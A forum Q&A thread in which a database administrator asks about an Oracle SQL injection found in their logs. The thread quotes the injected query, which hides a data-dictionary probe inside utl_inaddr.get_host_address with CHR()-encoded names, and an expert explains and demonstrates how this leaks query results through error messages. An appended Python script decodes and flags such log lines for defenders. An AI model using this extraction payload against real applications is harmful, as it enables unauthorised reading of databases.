Solved

sql injection to select utl_inaddr.get_host_address and XS$CACHE_DELETE

Posted on 2014-01-15
Last Modified: 2014-01-15
I found that someone used SQL injection to run this SQL in my Oracle database via a web application. I don't get his purpose. Why use utl_inaddr.get_host_address and the number of columns in XS$CACHE_DELETE???

select utl_inaddr.get_host_address(((
SELECT CAST (COUNT (column_name) AS CHAR (10))
  FROM all_tab_columns
 WHERE table_name =
             CHR (88)
          || CHR (83)
          || CHR (36)
          || CHR (67)
          || CHR (65)
          || CHR (67)
          || CHR (72)
          || CHR (69)
          || CHR (95)
          || CHR (68)
          || CHR (69)
          || CHR (76)
          || CHR (69)
          || CHR (84)
          || CHR (69)
))) from dual


Question by:Hoboly
7 Comments
 
LVL 74

Assisted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784466
Do you have a table called "XS$CACHE_DELETE"  ?


The purpose of using utl_inaddr.get_host_address is a quirk of the error message returned by the function. If the host name passed in produces an error, that "name" will be returned as part of the error.

For example....

select utl_inaddr.get_host_address('something that will produce an error') from dual

ORA-29257: host something that will produce an error unknown
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^



So, by nesting a query inside the function call, the query is executed and the output of the query is taken as a host name that will likely be illegal and generate an error. Then that illegal text will be returned as part of the error message.
 

Author Comment

by:Hoboly
ID: 39784470
No XS$DELETE,
but there is a table XS$CACHE_DELETE:

SQL> desc XS$CACHE_DELETE
 Name                                      Null?    Type
 ----------------------------------------- -------- ----------------------------
 OBJ_TYPE                                           NUMBER(2)
 NAME                                               VARCHAR2(4000)
 DEL_DATE                                  NOT NULL TIMESTAMP(6)

SQL>

It should be a standard Oracle 11g table.
 

Author Comment

by:Hoboly
ID: 39784471
Thanks sdstuber,
but I don't get why COUNT(column_name) goes into utl_inaddr.get_host_address.
If he wants to get the IP, he can just use utl_inaddr.get_host_address(host name) instead of utl_inaddr.get_host_address(column count).
 
LVL 74

Accepted Solution

by:sdstuber
sdstuber earned 500 total points
ID: 39784476
He doesn't want an ip address, he wants the query results.
That's the key to the injection.  By failing you get to see the inner query results.
Or by constructing a query that returns a numeric result that number will appear as part of an ip address even though it really isn't one.


Try this...

SELECT UTL_INADDR.get_host_address(
           'There are ' || (SELECT COUNT(*) FROM dba_tables) || ' tables in this database'
       )
  FROM DUAL;

You should get an error something like this.
The 2923 will vary based on your system.


ORA-29257: host There are 2923 tables in this database unknown



As I said above, the inner query is executed and the results are returned in the error.
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784483
XS$CACHE_DELETE - sorry, I posted that then saw my mistake and corrected it.

I don't know of a specific hack to utilize that table or its contents; but its mere existence would tell the hacker that XDB has been installed, and that knowledge can provide a new attack vector.
 
LVL 74

Expert Comment

by:sdstuber
ID: 39784487
Actually, on further review of the initial query, the error message part probably isn't going to happen. Sorry for the confusion.

If you run the injection query you should get either

0.0.0.0    -- meaning you do not have the table, i.e. XDB is not installed
 or
0.0.0.3    -- meaning you do have the table, i.e. XDB is installed


Using the same technique though, you can execute other queries and check the error messages to see what the results of those queries will be.
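For anyone triaging a similar finding, the following script is an added example (not code from this thread or from Oracle) of how a defender can make sense of the injected statement in a log: it decodes the CHR(n)||CHR(m)... chain back into the table name the attacker was probing, flags the pattern where utl_inaddr.get_host_address wraps a SELECT (the error/result-based extraction trick sdstuber describes), and shows why a bare column count comes back as an address like 0.0.0.3. The log lines, the `analyze` and `int_to_dotted_quad` function names, and the assumption that the resolver reads a bare integer as a 32-bit address (which is what the 0.0.0.0 / 0.0.0.3 outcomes above indicate) are all constructed for this example.

```python
import re

# Constructed sample log lines: the first is the statement from the question,
# flattened onto one line as a web-server or audit log would record it; the
# second is an ordinary, benign application query for contrast.
SAMPLE_LOG_LINES = [
    "2014-01-15 10:02:11 appuser SQL: select utl_inaddr.get_host_address((("
    "SELECT CAST (COUNT (column_name) AS CHAR (10)) FROM all_tab_columns "
    "WHERE table_name = CHR (88) || CHR (83) || CHR (36) || CHR (67) || CHR (65) "
    "|| CHR (67) || CHR (72) || CHR (69) || CHR (95) || CHR (68) || CHR (69) "
    "|| CHR (76) || CHR (69) || CHR (84) || CHR (69)))) from dual",
    "2014-01-15 10:02:12 appuser SQL: select name from products where id = 42",
]

# A single CHR(n) call, and a chain of them joined with ||.
CHR_ONE = re.compile(r"CHR\s*\(\s*(\d+)\s*\)", re.IGNORECASE)
CHR_CHAIN = re.compile(
    r"CHR\s*\(\s*\d+\s*\)(?:\s*\|\|\s*CHR\s*\(\s*\d+\s*\))*", re.IGNORECASE
)
# utl_inaddr.get_host_address whose argument opens with a nested SELECT.
HOST_ADDR_SUBQUERY = re.compile(
    r"utl_inaddr\s*\.\s*get_host_address\s*\(\s*(?:\(\s*)*select\b", re.IGNORECASE
)
TABLE_NAME_LITERAL = re.compile(r"table_name\s*=\s*'([^']*)'", re.IGNORECASE)


def decode_chr_chains(sql):
    """Replace every CHR(n)||CHR(m)... chain with the quoted literal it spells."""
    def repl(match):
        codes = [int(c) for c in CHR_ONE.findall(match.group(0))]
        return "'" + "".join(chr(c) for c in codes) + "'"
    return CHR_CHAIN.sub(repl, sql)


def int_to_dotted_quad(value):
    """Render an integer as the IPv4 address a resolver maps a bare number to
    (assumption for this example: single-integer address form, so 3 -> 0.0.0.3)."""
    value &= 0xFFFFFFFF
    return ".".join(str((value >> shift) & 0xFF) for shift in (24, 16, 8, 0))


def analyze(log_line):
    """Decode obfuscation in one log line and report why it is (or is not) suspicious."""
    decoded = decode_chr_chains(log_line)
    reasons = []
    if HOST_ADDR_SUBQUERY.search(decoded):
        reasons.append("utl_inaddr.get_host_address wraps a SELECT: "
                       "query output is smuggled out via the host-name argument")
    if CHR_CHAIN.search(log_line):
        reasons.append("string literal assembled from CHR() calls (quote-filter evasion)")
    if "all_tab_columns" in decoded.lower():
        reasons.append("reads data-dictionary view all_tab_columns (schema probing)")
    table = TABLE_NAME_LITERAL.search(decoded)
    return {
        "decoded": decoded,
        "suspicious": bool(reasons),
        "reasons": reasons,
        "probed_table": table.group(1) if table else None,
    }


if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        result = analyze(line)
        print("SUSPICIOUS" if result["suspicious"] else "ok", "|", result["decoded"][:80])
        for reason in result["reasons"]:
            print("   -", reason)
        if result["probed_table"]:
            print("   probed table:", result["probed_table"])
    # Why the count surfaces as an address rather than an error:
    for count in (0, 3):
        print(f"column count {count} -> host address {int_to_dotted_quad(count)}")
```

Run over the constructed lines, the first is flagged with all three reasons and the probed table decodes to XS$CACHE_DELETE, while the second is reported as ok; the last loop prints 0.0.0.0 for a count of 0 and 0.0.0.3 for a count of 3, matching the two outcomes described in the thread. The CHR() decoder is the piece worth keeping: attackers use it precisely so that the table name never appears in clear text in the request, and a WAF or log search that only looks for the literal name will miss it.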
 

Author Closing Comment

by:Hoboly
ID: 39784490
Excellent explanation! Thanks!